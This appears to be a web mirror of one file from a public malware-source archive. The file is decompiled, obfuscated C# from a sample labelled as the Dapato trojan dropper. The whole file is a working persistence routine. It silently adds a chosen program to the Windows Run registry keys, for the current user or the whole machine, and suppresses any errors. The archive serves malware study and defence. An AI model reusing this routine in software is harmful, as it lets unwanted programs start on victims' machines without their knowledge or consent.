mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
78 lines
3.8 KiB
C#
78 lines
3.8 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq
|
|||
|
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
|
|||
|
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
|
|||
|
{
|
|||
|
internal class NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq
|
|||
|
{
|
|||
|
public static void KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj(
|
|||
|
string name,
|
|||
|
string path,
|
|||
|
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg area)
|
|||
|
{
|
|||
|
switch (area)
|
|||
|
{
|
|||
|
case NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER:
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
break;
|
|||
|
}
|
|||
|
case NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine:
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
break;
|
|||
|
}
|
|||
|
default:
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
|
|||
|
break;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public enum IAHSgioahsgiaoshgiposahg
|
|||
|
{
|
|||
|
TheCurrentoftheUSER,
|
|||
|
TheLocalofMachine,
|
|||
|
Both,
|
|||
|
}
|
|||
|
}
|
|||
|
}
|